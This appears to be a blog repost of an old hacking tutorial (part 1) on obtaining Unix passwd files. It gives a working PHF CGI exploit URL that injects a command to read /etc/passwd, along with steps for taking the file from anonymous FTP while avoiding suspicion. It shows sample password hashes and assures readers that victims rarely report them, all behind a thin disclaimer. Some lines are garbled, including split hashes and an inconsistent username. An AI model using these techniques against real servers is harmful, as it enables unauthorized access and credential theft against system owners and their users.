CONTENTS
1. Introduction
2. What is a Passwd File?
3. PHF Exploit
4. FTP Passwd
5. Shadowed Passwds
6. Crackers
7. Wordlists
8. Using Cracked Passwds
________________________
1. Introduction
Passwd files are the easist and simplist ways to hack. This text will explain what they are, how to get them, how to crack them, what tools you will need, and what you can do with them. Of course the minute you sign on the account you just happened to crack because of this file, you are breaking the law. This text is for information, not illegal activites. If you choose to do illegal activies with the information from this it is no one's fault but your own. Now down to the good stuff [=.
________________________2. What is a Passwd File
A passwd file is an encrypted file that contains the users on a servers passwords. The key word here is encrypted, so don't start thinking all i have to do is find one and i hit the jackpot. Nope sorry Man, theres alot more to it than that. The passwd file should look something like this
root:x:0 :1 :0000 - Admin(0000):/:/bin/ksh
daemon:x:1 :1 :0000 -Admin(0000):/:
bin:x:2 :2 :0000 - Admin(0000):/usr/bin:
listen:x:37 :4 :Network Admin:/usr/net/nls:nobody:x: 60001 : 60001 :uid
nobody:/:noaccess:x: 60002 : 60002 :uid noaccess:/:
ftp:x:101 :4:
FTPUser:/export/home/ftp:
rrc:uXDg04 UkZgWOQ:201 :4:RichardClark:/export/home/rrc
Out of that entire section the only name you could use would be rrc:uXDg04 UkZgWOQ:201 :4:RichardClark:/export/home/rcc Heres how you read the File
rrc:uXDg04 UkZgWOQ:201 :4:RichardClark:/export/home/rcc
Username: rcc
Encrypted Password: uXDg04UkZgWOQ
User number: 201
Group Number: 4
Real Name (usually): Richard Clark
Home Directory: /export/home/rrc
Type of Shell: /bin/ksh
Because it is the only name with an encrypted password.
You will never find a passwd file that has a passwd for
anything like ftp, listen, bin, etc., etc. Occasionally
using the PHF exploit or unshadowing a passwd file you can get an encrypted password for root.
________________________
3. PHF Exploit
First let me explain what an exploit is. An Exploit is a hole in software that allows someone to get something out of it that... Well you aren't supposed to.
The PHF exploit is a hole in CGI, that most servers have fixed now (if they have CGI). Lets just say a very popular IRC place has a problem with their CGI. Also on the subject of servers with the exploit open, many forien servers have this open. Unlike the FTP Passwd you don't even have to access their FTP or login. What you do is get a WWW browser and then in the plass for the WWW address type:
http://www.target.com/cgi- bin/phf?Qalias=j00 %ffcat%20/etc/passwd
In www.target.com Place who's passwd you want to get. If you get a message like "The requested object does not exist on this server. The link you followed is either outdated, inaccurate,
or the server has been instructed not to let you have it." its not there. If you get "You have been caught on Candid Camera!" They caught you, but don't fear they rarly ever Report you. I have yet to find a server that does report. Of course if you get "root:JPfsdh1 NAjIUw:0 :0:Special admin sign in:/:/bin/csh
sysadm:ufcNtKNYj7 m9 I:0 :0:
Regular Admin login:/admin:/sbin/sh
bin:*:2 :2:Admin :/bin:
sys:*:3 :3:Admin :/usr/src:
adm:*:4 :4:Admin :/usr/adm:/sbin/sh
daemon:*:1 :1: Daemon Login for daemons needing
nobody:*: 65534 : 65534 ::/:
ftp:*:39 :39:FTP guest login:/var/ftp:
dtodd:yYn1 sav8 tKzOI:101 :100:John Todd:/home/dtodd:/sbin/sh
joetest:0 IeSH6 HfEEIs2 :102 :100::/home/joetest:/usr/bin/re stsh"
You have hit the jackpot [=. Save the file as a text and keep it handy, because you will need it for later in the lesson.
________________________4. FTP Passwd
The Passwd file on some systems is kept on FTP, which can pretty much be accessed by anyone, unless the FTP has a non-anonymous logins rule. If you are desprite to get a passwd file from a certain server (which may not even be open, so only do if you are desprite or you want to hack your own server) get an account that allows you access to their FTP. What you do is get an FTP client such as WS FTP or CuteFTP. Find the servers name and connect to it. You should get a list of Directories like "etc, hidden, incoming, pub" goto the one called etc. inside etc should be a few files like "group, passwd" if any chance you see one called shadow there is a 8 /10 chance you are about to deal with a shadowed passwd. Well get the passwd file and maybe check out what else is on the server so it won't look so suspious. Anyway when you log out, run and check out your new passwd file. If you only see names like "root, daemon, FTP, nobody, ftplogin, bin" with * beside their names where the encrypted passwd should be, you got a passwd file that you cannot crack. But if it happens to have user names (like rcc:*: or ggills:*:" with a * (or another symbol) you have a shadowed passwd. Of course if you have been reading and paying attention if you have something that has a few things that look like:
"joetest:0 IeSH6 HfEEIs2 :102 :100::/home/joetest:/usr/bin/re stsh"
You have gotten one you can crack
________________________chk part 2 to continue reading...
No comments:
Post a Comment